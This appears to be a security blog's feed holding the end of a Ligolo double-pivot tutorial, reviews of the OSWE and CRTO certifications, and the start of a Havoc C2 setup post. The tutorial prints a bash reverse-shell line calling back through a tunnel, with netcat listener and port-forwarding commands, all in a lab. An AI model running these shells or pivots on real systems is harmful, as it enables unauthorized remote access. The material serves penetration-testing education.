<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1684183124222/fe78fe4a-4e96-4fe0-b35c-efdeed43c846.png" alt class="image--center mx-auto" /></p>
<h2 id="heading-checking-connectivity-to-hosts-on-network-b">Checking Connectivity to Hosts on Network B</h2>
<pre><code class="lang-plaintext">ping 172.16.8.3
</code></pre>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1684183167405/1badb130-b09c-430d-bc14-fdf34f93acd4.png" alt class="image--center mx-auto" /></p>
<pre><code class="lang-plaintext">cme smb 172.16.8.0/24
</code></pre>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1684183177213/6a69ddee-15c3-4dd4-9945-d0e93501ca29.png" alt class="image--center mx-auto" /></p>
<p>Nice! We're able to reach Network B through our pivot 👍</p>
<hr />
<h1 id="heading-double-pivot">Double Pivot</h1>
<p>This is where things usually get a little chaotic. Typically we'd have sshuttle running on the initial pivot, put in place an SSH reverse port forward or a socat port forward on the initial pivot to send connections back to the Kali box, and then use something like chisel to establish a tunnel with the double pivot box.</p>
<p>With <strong>Ligolo</strong>, we're able to do something similar to <a target="_blank" href="https://hstechdocs.helpsystems.com/manuals/cobaltstrike/current/userguide/content/topics/pivoting_reverse-port-forward.htm">Cobalt Strike's</a> <code>rportfwd</code>. The <code>rportfwd</code> command in Cobalt Strike binds a port on the compromised target and relays all incoming traffic to a specified host and port. Ligolo performs this exact task with the <code>listener_add</code> command, which eliminates the need for multiple SSH reverse port forwards: everything is done within the same tunnel. Let's take a look at how that's done.</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1684186241621/28ebee29-5cb1-42f1-a917-28d1a62f186d.png" alt class="image--center mx-auto" /></p>
<pre><code class="lang-plaintext">RED - Hosts Reachable
BLUE - Established Pivot Tunnel
</code></pre>
<p>With the help of <code>listener_add</code> on DMZ01, we're able to establish a secure tunnel with the DC which we can use to directly access Network C without proxychains (🤢)!</p>
<h2 id="heading-creating-a-listener">Creating a Listener</h2>
<p>Create a listener on the initial pivot (the box that is connected to both Network A and Network B) to send the new host's traffic to the Proxy server so that it is able to establish a tunnel.</p>
<pre><code class="lang-plaintext">listener_add --addr 0.0.0.0:11601 --to 127.0.0.1:11601 --tcp
listener_list
</code></pre>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1684183793212/39627bc6-0a98-4267-82c5-77a0872bd603.png" alt class="image--center mx-auto" /></p>
<h2 id="heading-connect-double-pivot-box-to-proxy-server">Connect Double Pivot box to Proxy Server</h2>
<p>(The box that is connected to both Network B and Network C)</p>
<pre><code class="lang-plaintext">./agent.exe -connect 172.16.8.120:11601 -ignore-cert
</code></pre>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1684183890399/14ca15ec-d012-4013-8c1b-d8322ebcaa2a.png" alt class="image--center mx-auto" /></p>
<h3 id="heading-start-tunnel">Start Tunnel</h3>
<p>(On Proxy Server)</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1684183933474/235e28d5-4894-463a-bbb6-847ee6457b6e.png" alt class="image--center mx-auto" /></p>
<h3 id="heading-adding-a-new-route-on-proxy-server-1">Adding a new route on Proxy Server</h3>
<pre><code class="lang-plaintext">sudo ip route add 172.16.9.0/24 dev ligolo
</code></pre>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1684183970690/b189fcd8-296c-4712-9494-cf73c0ce957b.png" alt class="image--center mx-auto" /></p>
<h2 id="heading-checking-connectivity-to-hosts-on-network-c">Checking Connectivity to Hosts on Network C</h2>
<pre><code class="lang-plaintext">ping 172.16.9.25
</code></pre>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1684184059247/c8304a7b-c178-44db-9b09-7c4791a7e8c8.png" alt class="image--center mx-auto" /></p>
<pre><code class="lang-plaintext">nmap -Pn -p 22 172.16.9.25
</code></pre>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1684184073164/f7054b3d-064f-4369-b714-929638840691.png" alt class="image--center mx-auto" /></p>
<pre><code class="lang-plaintext">ssh -i ssmallsadm.key ssmallsadm@172.16.9.25
</code></pre>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1684184091268/2f70c8dd-f43a-4a03-b0c3-c2b322e19aab.png" alt class="image--center mx-auto" /></p>
<hr />
<h1 id="heading-catching-reverse-shell-via-double-pivot">Catching Reverse Shell via Double Pivot</h1>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1684186284852/875050ab-5031-4eda-bb43-ef49266e7f31.png" alt class="image--center mx-auto" /></p>
<pre><code class="lang-plaintext">RED - Hosts Reachable
BLUE - Established Pivot Tunnel
GREEN - Reverse Shell Traffic
</code></pre>
<p>Since we can now reach the various networks directly, a reverse shell isn't ideal; a bind shell would be more efficient. However, for a scenario where we aren't able to bind to ports on a particular box, let's take a look at how a reverse shell can be caught through the tunnel.</p>
<p>Instead of having to forward ports from MGMT01 → DC01 → DMZ01 → Kali, with <strong>Ligolo</strong> we could create a listener on DC01 which would directly forward traffic to our Kali box via the existing tunnel!</p>
<h2 id="heading-creating-a-listener-1">Creating a Listener</h2>
<pre><code class="lang-plaintext">listener_add --addr 0.0.0.0:9001 --to 127.0.0.1:9001 --tcp
</code></pre>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1684184275566/460345f9-5b44-42a4-85ae-63bce1796f9a.png" alt class="image--center mx-auto" /></p>
<p>Listener #1 will now forward all traffic hitting DC01:9001 to PROXYSERVER:9001. (You could also forward it to another host if necessary.)</p>
<h3 id="heading-triggering-amp-catching-reverse-shell">Triggering &amp; Catching reverse shell</h3>
<p><strong>MGMT01</strong></p>
<pre><code class="lang-plaintext">sh -i &gt;&amp; /dev/tcp/172.16.9.3/9001 0&gt;&amp;1
</code></pre>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1684184416683/375ff1e8-6b3c-4e76-8807-54e792c7ba92.png" alt class="image--center mx-auto" /></p>
<p><strong>KALI</strong></p>
<pre><code class="lang-plaintext">nc -nvlp 9001
</code></pre>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1684184430605/b8857f92-6afd-4a33-b924-67dc99afe209.png" alt class="image--center mx-auto" /></p>
<p>That's all there is to it!</p>
<hr />
<p>Hope this helps someone out there who's having a hard time double / triple / quadruple / quintuple pivoting with the usual toolz!</p>
]]></content:encoded></item><item><title><![CDATA[OSWE - Advanced Web Attacks and Exploitation - Review (2023)]]></title><description><![CDATA[Introduction
It's been a while since I wrote one of these and I'm thrilled to share with you my journey to becoming an Ofsec Web Expert (OSWE). As someone who's always been interested in web application security, earning the OSWE certification has be...]]></description><link>https://4pfsec.com/oswe</link><guid isPermaLink="true">https://4pfsec.com/oswe</guid><category><![CDATA[OSWE]]></category><category><![CDATA[#cybersecurity]]></category><category><![CDATA[offsec]]></category><dc:creator><![CDATA[Nee]]></dc:creator><pubDate>Fri, 28 Apr 2023 21:35:28 GMT</pubDate><enclosure url="https://cdn.hashnode.com/res/hashnode/image/upload/v1682717199568/35785ca7-4f46-44c9-9b76-c2a342d73ddb.jpeg" length="0" type="image/jpeg"/><content:encoded><![CDATA[<h1 id="heading-introduction">Introduction</h1>
<p>It's been a while since I wrote one of these and I'm thrilled to share with you my journey to becoming an Offsec Web Expert (OSWE). As someone who's always been interested in web application security, earning the OSWE certification has been a major accomplishment for me both personally and professionally.</p>
<p>In this blog post, I'll give you a glimpse into my background in web application security, and share my experience studying for the certification exam. I hope that by sharing my own story, I can inspire and guide others who are on a similar path.</p>
<p>So, whether you're a fellow security enthusiast, a student just starting out, or my future employer, I invite you to join me as I reflect on my journey and share some tips and insights along the way. Let's dive in!</p>
<hr />
<h1 id="heading-background">Background</h1>
<h2 id="heading-professional">Professional</h2>
<p>I am a cybersecurity enthusiast with limited experience in web application security. My passion lies more in finding vulnerabilities and exploiting them rather than in coding. I have a solid foundation in cybersecurity and penetration testing, but not the same for web exploitation. I have worked on various security projects in the past, including vulnerability assessments, penetration testing, and incident response.</p>
<h2 id="heading-education-andamp-certifications">Education &amp; Certifications</h2>
<p>I have a background in Information Technology and hold a couple of red certs like the OSCP and CRTO, networking certs and server-side certs like the RHCSA. Although coding is not my strong suit, I do have some experience in PHP web application development which has given me a basic understanding of web application architecture. I also consider myself a scripter and not a coder 😂. Hope that changes soon tho...</p>
<h2 id="heading-motivation-to-pursue-oswe">Motivation to Pursue OSWE</h2>
<p>Despite my background in offensive cybersecurity, I had a strong interest in web application security and wanted to learn more about it. I decided to pursue the Advanced Web Attacks and Exploitation (AWAE) course to deepen my knowledge and skills in this area and more specifically a white box approach. Although I knew that digesting the various coding languages would be a challenge for me, I was motivated to push myself and expand my skill set to become a more well-rounded cybersecurity professional.</p>
<hr />
<h1 id="heading-preparation">Preparation</h1>
<h2 id="heading-out-of-lab-preparation">Out-of-Lab Preparation</h2>
<p>Before stepping into the Offsec labs, I prepped for the course by completing a couple of the BurpSuite labs and building Python scripts to automate the exploitation of the challenges. I found that this helped me build up my scripting ability, specifically in using the requests &amp; socket libraries to interact with web applications. By automating the exploitation process, I was able to gain a deeper understanding of how different web application vulnerabilities could be exploited and how to craft custom payloads and incorporate them into the exploitation chain. I also practiced using various BurpSuite extensions to assist with manual testing and vulnerability identification.</p>
<h2 id="heading-offsec-labs">Offsec Labs</h2>
<h3 id="heading-guided-labs">Guided Labs</h3>
<p>The Offensive Security labs for the OSWE were definitely challenging and rigorous given my background. But they provided an excellent learning experience. The labs covered a wide range of web application vulnerabilities, including injection attacks, broken authentication and session management, cross-site scripting (XSS), and more.</p>
<p>The lab materials were well-written and provided clear guidance on how to identify and exploit the vulnerabilities. However, the labs also required a lot of independent research and experimentation to fully understand and exploit the vulnerabilities, which I found to be both frustrating and rewarding.</p>
<p>I also appreciated the ability to use the lab environment to test out new techniques and hone my skills. The lab environment was realistic and walked the students through real-world (outdated) applications and their exploitation techniques. Additionally, the lab environment was well-designed and easy to use, which allowed me to focus on learning and exploiting vulnerabilities instead of struggling with technical issues (I'll get to this in the next few sections lol). Overall, the lab experience was challenging and time-consuming, but it was also one of the most valuable parts of my preparation for the OSWE exam.</p>
<h3 id="heading-extra-mile-exercises">Extra-Mile Exercises</h3>
<p>The OSWE labs also feature a set of "extra mile" challenges, which are designed to push candidates even further beyond the guided exercises. These challenges require a deeper understanding of the underlying web technologies and an ability to think outside the box to identify and exploit vulnerabilities. The extra mile challenges are not guided and there is no walk-through available, which means that the candidate must use all the knowledge and skills they have acquired to complete these challenges. These extra-mile challenges were particularly satisfying to complete, as they required me to apply what I had learned in a more creative and unguided manner.</p>
<h3 id="heading-unguided-labs">Unguided Labs</h3>
<p>One of the unique features of the OSWE course is the unguided labs, which test the techniques taught in the course without any walkthrough or guidance. (Similar to how we'd use Proving Grounds or HTB for the PWK.) These labs are designed to simulate real-world scenarios where the attacker has to identify and exploit vulnerabilities on their own. I found these labs to be particularly challenging (ish), as they required a lot of independent research and experimentation to complete successfully. However, they were also very rewarding, as they helped me develop my problem-solving and critical-thinking skills.</p>
<p>The unguided labs forced me to think creatively and come up with unique solutions to exploit the vulnerabilities, which helped me gain a deeper understanding of web application security.</p>
<h2 id="heading-community">Community</h2>
<p>Community support was a critical component of my preparation for the OSWE exam. I found the OSWE Discord channel and the internal forums to be excellent resources for asking questions, getting feedback on my approaches, and learning from other students' experiences. If you run into an "unsolvable" issue, there's probably someone who has been there and gotten over the hurdle.</p>
<p>The student admins were also fairly active on the Discord channel and provided valuable insights and guidance throughout the course to students who were facing issues.</p>
<p>Additionally, I found the various online blogs written by individuals (like this one) to be helpful resources for some initial guidance.</p>
<h2 id="heading-note-taking">Note-taking</h2>
<p>(<mark>Notion</mark> is the only right answer)</p>
<p>Note-taking was a critical component of my preparation for the exam. During the course, I made sure to take detailed notes on every technique and attack vector covered in the lectures and labs. I found that by taking notes, I was better able to internalize the material and retain the information. Additionally, note-taking allowed me to keep track of the various tools and commands used in each attack vector, which made it easier to reference them later.</p>
<p>During the exam, having detailed notes allowed me to quickly look up anything I needed, saving me precious time and allowing me to focus on the task at hand.</p>
<hr />
<h1 id="heading-the-exam">The Exam</h1>
<h2 id="heading-background-1">Background</h2>
<p>The OSWE exam is a 48-hour practical exam focused on web application security. It is conducted remotely, and candidates are given access to a virtual network containing multiple vulnerable web applications. The goal of the exam is to identify and exploit vulnerabilities in these applications to gain access to sensitive information or perform unauthorized actions.</p>
<p>The exam is hands-on, meaning that candidates must demonstrate their ability to identify, exploit, and document vulnerabilities in a practical setting. The exam is graded based on the number and severity of vulnerabilities found, as well as the quality of the documentation provided. To pass the exam, a candidate must score at least 85 points out of 100.</p>
<h2 id="heading-remote-proctoring">Remote Proctoring</h2>
<p>Candidates are closely monitored by a proctor to ensure the integrity of the exam. The proctoring process is conducted via webcam and screen-sharing software, which allows the proctor to observe the candidate's actions and ensure that they are not using any unauthorized resources or receiving outside assistance. Although the idea of being closely monitored can be intimidating, I found the proctoring process to be quite professional and unobtrusive. Candidates are allowed to plug headphones in as long as they're only connected to the host device that's involved in the exam. (Didn't know this previously lol)</p>
<p>As always you're allowed to take short breaks &amp; log off for naps. However, you're given 2 options if you decide to log off. You could leave your computer on and untouched or disconnect from the VPN. But this will cause you to lose connection to the infra and the VPN connection would be paused. Thus, I decided to leave my computer on and run some of my scripts for testing.</p>
<p>I'm sorry to the proctor that had to sit through me bopping my head and "rapping".</p>
<h2 id="heading-the-actual-exam">The Actual Exam</h2>
<p>During the exam, I was able to fully exploit both the given machines and complete all the required objectives. It was a very humbling experience to see how far I had come from my initial dabbling in web exploitation. I was especially grateful for the <strong><em>unguided lab machines</em></strong> and the <strong><em>extra-mile exercises</em></strong>.</p>
<h3 id="heading-debugging">Debugging</h3>
<p>Debugging is an important aspect of the OSWE exam. During the exam, you will encounter various challenges that require you to write your own exploits. It's essential to have a solid understanding of how the exploit works and what it does. If something isn't working correctly, debugging is the process of finding out what's wrong and fixing it.</p>
<p>This can involve looking at the source code of the exploit, understanding how the target application works, and using various debugging tools to pinpoint the issue. In some cases, you may need to use trial and error to identify the problem. The ability to debug effectively can make all the difference in the success or failure of an exploit. It's crucial to practice this skill during your preparation so that you are comfortable with it on exam day (utilize the lab!!).</p>
<h3 id="heading-methodology">Methodology</h3>
<p>During the exam, I followed a methodology that prioritized understanding the web application and its functionalities over just looking for individual vulnerabilities. This approach helped me to chain together multiple attack vectors and achieve full exploitation of the given machines. I first performed a thorough reconnaissance to identify all possible entry points and attack surfaces. Then, I used manual testing techniques to identify potential vulnerabilities and attack vectors.</p>
<p>Once I identified potential attack vectors, I focused on understanding the application logic and how I could chain together different vulnerabilities to achieve my objectives. I found that by taking this approach, I was able to maximize my exploitation potential and fully demonstrate my understanding of the web application. Starting my analysis from unauthenticated portions of the web application always seems to reward me the most (as expected).</p>
<p>This methodology was extremely effective during the exam (at least for me!).</p>
<h3 id="heading-deliverables">Deliverables</h3>
<p>The OSWE exam requires the candidate to submit two deliverables (in one document) within 24 hours of completing the exam. The first deliverable is a detailed report of the exploitation process, including steps taken, tools used, and vulnerabilities exploited (with vulnerable code snippets and explanations). The report must also include a description of the custom scripts or tools developed during the process. The second deliverable is the 0-click exploit script which is able to automate the exploitation of all discovered vulnerabilities.</p>
<p>The report and script are both reviewed by the OffSec team, and the candidate must demonstrate a clear understanding of the exploitation process and the vulnerabilities exploited. The deliverables are an important part of the OSWE exam, as they allow the candidate to showcase their skills and provide evidence of their abilities.</p>
<h3 id="heading-templated-snippets">Templated snippets</h3>
<p>While you go through the course, you'll have created and improved your custom exploit scripts. Please template these and safekeep them. It's gonna be extremely helpful in the exam when you need to not only find and exploit the vulnerabilities but create a script to automate them. Read up and practice using requests, WebSockets (made me contemplate life decisions in the lab) and other web-related libraries.</p>
<h3 id="heading-support">Support</h3>
<p>The exam support team was always available to answer any questions or concerns I had. Whenever I encountered any technical issues or needed clarification on the exam instructions, they were quick to respond and provide assistance. Their prompt and professional responses helped me to focus on the exam itself without any added stress or anxiety. ASK IF UNSURE!!</p>
<hr />
<h1 id="heading-issues-i-faced">Issues I faced</h1>
<p>(more like issues that faced me but ok)</p>
<p>As always, not everything was rainbows and sunshine. While going through the AWAE course, I faced a few challenges that tested my perseverance. From grappling with complex web application vulnerabilities to struggling with the <em>NEW</em> Offsec Learning Portal, I encountered various hurdles along the way.</p>
<p><img src="https://media.tenor.com/VgTtsgbdqAAAAAAM/trying-hard-baby-yoda.gif" alt="Try Harder GIFs | Tenor" class="image--center mx-auto" /></p>
<h2 id="heading-the-new-portal-lms">The New Portal (LMS)</h2>
<p>Offsec recently released a new <a target="_blank" href="https://portal.offsec.com/">portal</a> to replace its old portal which could only be accessed via their VPN. The platform itself is pretty flash, clean and pleasing to the eye. The issues I faced during my lab time were all reliability related.</p>
<p>The portal was extremely unstable. It kept going down without prior notice which affected a ton of fellow students. There were multiple instances where I would set aside precious time away from work and uni just to get hit with the "<strong>Unannounced Outage</strong>".</p>
<p>Offsec did give out lab extensions to students on a case-by-case basis. However, the extension was pretty invaluable to me as I was already on the learn one package. I was only left with frustration and disappointment ☹️.</p>
<p>But I don't entirely blame them as their support team was pretty responsive and transparent. They were facing such instability due to the new PEN200 labs and having students migrated to the new infrastructure. Hope future students wouldn't have to go through what I did!</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1682717424188/bdca0e55-0606-4421-98fc-465aff73efc3.png" alt class="image--center mx-auto" /></p>
<h2 id="heading-deliverables-1">Deliverables</h2>
<p>I found it odd that candidates are expected to attach the exploit script in the report document that is due for submission. I was extremely paranoid and kept pasting my exploit script multiple times into the report document before converting it to the preferred <code>.pdf</code> format.</p>
<p>I'm sure they have a valid reason for this. (Don't want students possibly submitting malicious files. Do let me know if you know of other reasons). But I do believe something else can be done about this situation to prevent paranoia amongst students.</p>
<hr />
<h1 id="heading-conclusion">Conclusion</h1>
<p>Undoubtedly, the OSWE certification journey was a demanding one, but the knowledge gained and the skills developed throughout the process made it all worthwhile. The course and lab materials provided by Offensive Security were extensive and well-structured, allowing me to develop a deeper understanding of web application security and hone my skills in exploiting web vulnerabilities.</p>
<p>The exam itself was a true test of my abilities and required me to think outside of the box to fully exploit the given machines. I am proud to have earned the OSWE certification and look forward to applying my knowledge and skills in future engagements. Thank you to everyone who's helped me through this journey 😁! Hope this helps someone out there who's looking to embark on this journey. Do not hesitate to reach out to me <code>Nee#0110</code>!</p>
<hr />
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1682716598211/56030e31-9137-4db8-a341-17d48e643b4f.png" alt class="image--center mx-auto" /></p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1682716727650/b35a54ed-ad86-4d8f-b046-58d33a1f8e07.png" alt="Just to feel like this it took a long time yeaaauh!" class="image--center mx-auto" /></p>
<hr />
]]></content:encoded></item><item><title><![CDATA[Zero-Point Security's Certified Red Team Operator (CRTO) Review]]></title><description><![CDATA[Red Team Ops is a course that teaches the basic principles, tools and techniques, that are synonymous with red teaming. Students will first cover the core concepts of adversary simulation, command & control, and how to plan an engagement. They will t...]]></description><link>https://4pfsec.com/zero-point-securitys-certified-red-team-operator-crto-review</link><guid isPermaLink="true">https://4pfsec.com/zero-point-securitys-certified-red-team-operator-crto-review</guid><category><![CDATA[Certification]]></category><dc:creator><![CDATA[Nee]]></dc:creator><pubDate>Thu, 13 Oct 2022 19:33:53 GMT</pubDate><enclosure url="https://cdn.hashnode.com/res/hashnode/image/upload/v1680982887455/0cd30dfc-8a44-49ce-be72-d2c2f7158b7d.jpeg" length="0" type="image/jpeg"/><content:encoded><![CDATA[<blockquote>
<p><em>Red Team Ops is a course that teaches the basic principles, tools and techniques, that are synonymous with red teaming. Students will first cover the core concepts of adversary simulation, command &amp; control, and how to plan an engagement. They will then learn about each stage of the attack lifecycle from initial compromise to full domain takeover, data hunting, and data exfiltration.</em></p>
</blockquote>
<p><a href="https://training.zeropointsecurity.co.uk/courses/red-team-ops">https://training.zeropointsecurity.co.uk/courses/red-team-ops</a></p>
<h2 id="heading-background"><strong>Background</strong></h2>
<p>I enrolled into Zero-Point Security's Red Team Operator course about 2 months ago and cleared the exam with 8/8 flags on the 13th of October. Throughout the year, I've been experimenting and playing around with Active Directory Exploitation and Opensource C2 Frameworks <a target="_blank" href="https://ad.4pfsec.com/">in my lab</a>.</p>
<p>Both Zero-Point's CRTO and Pentester Academy's CRTP have been on my radar for a while now. Looking into the outline of these courses, I realized that RTO focuses more on the entire attack lifecycle from the initial compromise to full domain takeover. That was what pushed me over the fence to pursue this course.</p>
<hr />
<h2 id="heading-the-course"><strong>The Course</strong></h2>
<p>The course alone costs £365.00. There is also an option which gets you 40 hours of lab time with the course which costs £399.00. Zero Point Security also recently added an option which allows students to split the payment up into 4 smaller payments.</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1680982006003/13ea80ef-a636-4d4e-8acf-c6432da20fea.png" alt class="image--center mx-auto" /></p>
<hr />
<h3 id="heading-course-content"><strong>Course Content</strong></h3>
<p>The course contains 27 comprehensive chapters. Each chapter goes in depth, with well-documented explanations, commands and screenshots to back them up. The content was fairly easy to absorb given that I was actively trying the TTPs in the course lab, which I'll talk about in the next section.</p>
<p>Whenever I felt lost with any of the chapters, there was a set of videos I could refer to that demoed the attacks taught in the course. However, I should preface this by saying that not all chapters and sections have their own video. I thoroughly enjoyed the red-teaming techniques &amp; concepts that this course brought across. Here are some of my favourite sections this course had to offer.</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1680982123796/72837220-6e6a-43c5-b68b-e5b25c24e3ea.png" alt class="image--center mx-auto" /></p>
<p><strong>OPSEC</strong></p>
<p>One thing I really appreciated was that the course didn't just teach you how to throw tools and techniques at the target. It placed emphasis on performing attacks with OPSEC in mind, which I hadn't seen before, and it educates you on what a red teamer has to keep in mind when conducting engagements.</p>
<p><strong>Initial Compromise</strong></p>
<p>I've gone through a number of initial access modules from other organisations. However, what stood out to me in RTO was that the course teaches you how to build a detection system with the help of Kibana. This was my first time doing that and seeing what blue teamers actually see.</p>
<p><strong>Active Directory Exploitation</strong></p>
<p>This course taught quite a number of AD attacks. From credential and user impersonation to Kerberos attacks to domain dominance and persistence techniques, this course covered it all. The learning was also extremely hands-on: I was able to execute every attack taught in the course in the lab.</p>
<p><strong>Cobalt Strike</strong></p>
<p>Prior to this I'd heard some great things about Cobalt Strike, but I'd only ever used free &amp; open-source C2s. Although this course teaches session passing between C2s, it uses Cobalt Strike as its primary C2. The course also provides you with a valid copy of Cobalt Strike to play around with in the lab, at no extra charge on top of your lab cost. I've also been wanting to learn Cobalt Strike for a while now, so this course killed two birds with one stone :)</p>
<p><strong>Bypassing Antivirus</strong></p>
<p>The course also covers some basics of bypassing an active antivirus on a target host. This chapter ties in well with using Cobalt Strike to generate payloads and putting them into action. Students won't be able to bypass an up-to-date AV with this alone, as it is just an introduction to the topic. However, the concepts taught are still extremely valid. If you're interested in dealing with EDRs, check out <a target="_blank" href="https://training.zeropointsecurity.co.uk/courses/red-team-ops-ii">CRTO II</a>.</p>
<hr />
<h3 id="heading-course-lab"><strong>Course Lab</strong></h3>
<p>I was very content with what I got for the price I paid. The lab consists of a couple of Windows hosts across a few AD forests. As you go through the course, you'll pick up the techniques needed to own all the forests.</p>
<p><strong>Backend</strong></p>
<p>As someone who runs their <a target="_blank" href="https://homelab.4pfsec.com/">own home lab</a>, I'm naturally someone who's extremely interested in infra. I was impressed by how Zero-Point Security had set the lab up. The lab is deployed on AWS with the help of Snap Labs, and students are required to create a Snap Labs account to redeem the lab.</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1680982139251/841297e3-56b2-43bc-a18c-b217328fc2c9.png" alt class="image--center mx-auto" /></p>
<p>There's also an admin box running <a target="_blank" href="https://guacamole.apache.org/">Apache Guacamole</a> (the same solution I use 😄) to provide remote desktop access via a web browser. Yep, you can only access the lab via web RDP. I was initially pretty upset with this, as the latency was extremely bad (I'm based in SG). However, I learned that this was a requirement for having a valid copy of Cobalt Strike for us to play around with in the lab.</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1680982152433/794529e7-8e33-4d0a-b4fd-07f7acf24490.png" alt class="image--center mx-auto" /></p>
<p><strong>Content</strong></p>
<p>The machines and setup of the lab were more than enough to learn and practise the TTPs taught throughout the course. I didn't find anything lacking, and there were sufficient hosts and forests to test against.</p>
<p>I was given 40 hours of lab time with the default package. I ended up using about 35.5 hours for my practice. However, if you require more lab time you are able to purchase it <a target="_blank" href="https://www.zeropointsecurity.co.uk/lab-time">here</a> for £1.25 a month.</p>
<p><strong>Support</strong></p>
<p>Support is provided through 3 main channels.</p>
<ul>
<li><p>Rasta himself via support mail &amp; Discord</p>
</li>
<li><p>Active community on discord</p>
</li>
<li><p>Community forums on the LMS</p>
<p>  <img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1680982163608/7de5fd2d-e507-4675-a41f-766835eda49b.png" alt class="image--center mx-auto" /></p>
</li>
</ul>
<p>The community is extremely helpful in most cases. The Discord server also acts as an archive of all the issues other students have faced. It has helped me countless times, and I couldn't be more thankful for it!</p>
<hr />
<h2 id="heading-the-exam"><strong>The Exam</strong></h2>
<p>The CRTO certification exam is a 48-hour practical engagement that sets out to simulate a realistic red team engagement, testing students on adversary simulation, command &amp; control, engagement planning and time management. Students are required to collect 6 out of the 8 flags in the environment to pass the exam.</p>
<p>The exam absolutely picks your brain on all the content taught throughout the course. It's not a direct copy of the course lab and requires you to think outside the box and chain multiple TTPs in order to gain access to the machines. The exam's 40 hours can be spread over 4 days. This is to give you ample time to relax, refresh and get some quality sleep.</p>
<h3 id="heading-my-exam-experience"><strong>My Exam Experience</strong></h3>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1680982188408/81fbf135-c6ee-45d3-abdc-f61750f43cc2.png" alt class="image--center mx-auto" /></p>
<p>My personal experience with the exam was mostly positive! I used up about 32 of the 48 hours for the exam. I was able to rack up 6 flags to secure the pass in about 6 hours. However, I hit a mental block after that. I tried various methods and followed false leads to get the last 2 flags, but nothing was working. After taking a mini break I was able to secure the 7th flag 4 hours after the 6th.</p>
<p>The last flag, however, had me going crazy. I was trying all sorts of attacks to get to it. At one point I even started to wonder whether there was a technical issue and reached out to <a target="_blank" href="https://twitter.com/_rastamouse">the creator</a>, who confirmed that there were no such issues. There was a point in the exam where I started throwing ZeroLogon at the DCs 😅. I ended up logging off for the night, went to work the next day, had dinner with friends and restarted the exam environment the following night. After a good 7 hours and trying almost every attack, something struck me, and I got to the final flag. A solid journey IMO! Worth the pain.</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1680982200335/86412786-9908-4861-831f-f14b216746be.png" alt class="image--center mx-auto" /></p>
<hr />
<h2 id="heading-improvements"><strong>Improvements</strong></h2>
<p>Overall, I'm really happy with what I got from this course. I learned a ton and it didn't break the bank. Rasta also recently upgraded the Cobalt Strike deployed in the lab to the latest version and reworked some of the sections, including new screenshots and demo videos!</p>
<p>The only suggestion I have is to expand the AWS regions on offer. Let students choose the region closest to them to enable the best learning experience! Other than that, that's it from me! Highly recommended course 😁</p>
]]></content:encoded></item><item><title><![CDATA[Havoc C2: First look]]></title><description><![CDATA[Havoc is a modern and malleable post-exploitation command and control framework, created by @C5pider. I first came into contact with Havoc C2 in April 2022 when it was still a private tool under development. C5pider went on Flangvik's stream to discu...]]></description><link>https://4pfsec.com/havoc-c2-first-look</link><guid isPermaLink="true">https://4pfsec.com/havoc-c2-first-look</guid><category><![CDATA[tools]]></category><dc:creator><![CDATA[Nee]]></dc:creator><pubDate>Wed, 05 Oct 2022 11:53:38 GMT</pubDate><enclosure url="https://cdn.hashnode.com/res/hashnode/image/upload/v1680983209263/15d0fae2-bff2-40b3-af6c-23a456d24102.jpeg" length="0" type="image/jpeg"/><content:encoded><![CDATA[<p>Havoc is a modern and malleable post-exploitation command and control framework, created by <a target="_blank" href="https://twitter.com/C5pider">@C5pider</a>. I first came into contact with Havoc C2 in April 2022 when it was still a private tool under development. C5pider went on <a target="_blank" href="https://www.twitch.tv/flangvik">Flangvik</a>'s stream to discuss about development in general and demoed this awesome tool. Back in May it was announced that Havoc would be released in about <a target="_blank" href="https://twitter.com/C5pider/status/1523651907558211584">3-5 months</a> and here we are!</p>
<p>I'm going to deploy this into my infra and play around with it in this post! I've been wanting to test out the <a target="_blank" href="https://github.com/Cracked5pider/Ekko">Sleep Obfuscation</a> implementation in the Demon agent for a while now.</p>
<p>Sidenote: You'll notice a lot of similarities between Havoc and Cobalt Strike and that's not necessarily a downside IMO!</p>
<p><a href="https://github.com/HavocFramework/Havoc">https://github.com/HavocFramework/Havoc</a></p>
<hr />
<h2 id="heading-prerequisites">Prerequisites</h2>
<ul>
<li><p>Debian-Based Host (C2 Server)</p>
</li>
<li><p>Debian-Based Host (C2 Client)</p>
</li>
<li><p>Target Host (Windows 7/10/11)</p>
</li>
</ul>
<hr />
<h2 id="heading-setup-andamp-installation">Setup &amp; Installation</h2>
<p>(C2 Server)</p>
<h3 id="heading-installation">Installation</h3>
<p><em>Prerequisites Packages</em></p>
<pre><code class="lang-plaintext">┌──(nee㉿4pfsec)-[~] 
└─$ sudo apt install -y git build-essential apt-utils cmake libfontconfig1 libglu1-mesa-dev libgtest-dev libspdlog-dev libboost-all-dev libncurses5-dev libgdbm-dev libssl-dev libreadline-dev libffi-dev libsqlite3-dev libbz2-dev mesa-common-dev qtbase5-dev qtchooser qt5-qmake qtbase5-dev-tools libqt5websockets5 libqt5websockets5-dev qtdeclarative5-dev golang-go qtbase5-dev libqt5websockets5-dev libspdlog-dev python3-dev libboost-all-dev mingw-w64 nasm
</code></pre>
